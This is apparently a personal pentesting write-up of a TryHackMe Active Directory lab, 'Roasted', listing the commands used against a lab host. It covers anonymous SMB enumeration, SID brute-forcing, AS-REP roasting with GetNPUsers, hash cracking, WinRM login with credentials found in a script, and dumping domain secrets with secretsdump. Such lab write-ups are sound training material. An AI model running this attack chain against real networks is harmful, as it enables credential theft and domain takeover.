> For the complete documentation index, see [llms.txt](https://infintesky.gitbook.io/pentesting/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://infintesky.gitbook.io/pentesting/active-directory/tryhackme-practice/roasted.md).

# Roasted

## Information Gathering

`sudo nmapAutomator.sh 10.10.22.148 all`

![](/files/NVufergtx6PythZivFfn)

### Service Enumeration

### SMB (Port 139/445)

Seems like we have read perms for business-anonymous and enterprise-anonymous shares.

`crackmapexec smb 10.10.22.148 -u 'Anonymous' -p '' --shares`

![](/files/OlDyoRISvhz9b1XZ59hD)

Let's download the files and check out if there is anything interesting.

![](/files/WV3HqhPhtlKauDvPcSAw)

![](/files/7AgUgJQ6xvhCp6BifNZP)

![](/files/MlRuqcODGCYXvuCU6ear)

![](/files/7Hy61GS96iFmtVKvAK3R)

Does not look like there is much other than the employee names which could be useful for further enumeration.

At least now we know there is anonymous login, we can make use of impacket's lookupsid which

performs brute-forcing of Windows SID’s to identify users/groups on the remote target.

`lookupsid.py Anonymous@10.10.22.148 >> users.txt`

![](/files/COKika0CnBjdwkb1u3MF)

Extract usernames with vim magic.

![](/files/1HwjBgINOAyq2Q1a7cPx)

Let's use impacket's GetNPUsers to list and get TGTs for those users that have the property 'Do not require Kerberos pre authentication' set (UF\_DONT\_REQUIRE\_PREAUTH).

`GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.22.148 -usersfile users.txt`

![](/files/z28ccINf902opr7yV4Fs)

Great, looks like we have the hash for `t-skid` user. We can use john to crack it.

![](/files/gVwCfUUTT4fkY7qZorgZ)

Let's check if we have any new access in SMB.

![](/files/yKWxEOeYfe9lnUIILj97)

Looks like under the `NETLOGON` share there is a `ResetPassword.vbs` file.

![](/files/Mqk45tvwzklyPOUZ2M8Q)

![](/files/iKBRX5kTPJYGinGZM9ao)

Seems like we are able to get some credentials that are in plaintext in the file.                                          &#x20;

`a-whitehat:bNdKVkjv3RR9ht`

`evil-winrm -i 10.10.22.148 -u a-whitehat -p 'bNdKVkjv3RR9ht'`

![](/files/jUGeQ4oaXLhALUcHXxCj)

Impacket’s secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and Kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques.

`secretsdump.py 'vulnnet-rst.local/a-whitehat@10.10.22.148'`

![](/files/WqdjIWRYBBMG8KQ1VmpB)

![](/files/fIsnVQcmE5QV496IVBFn)
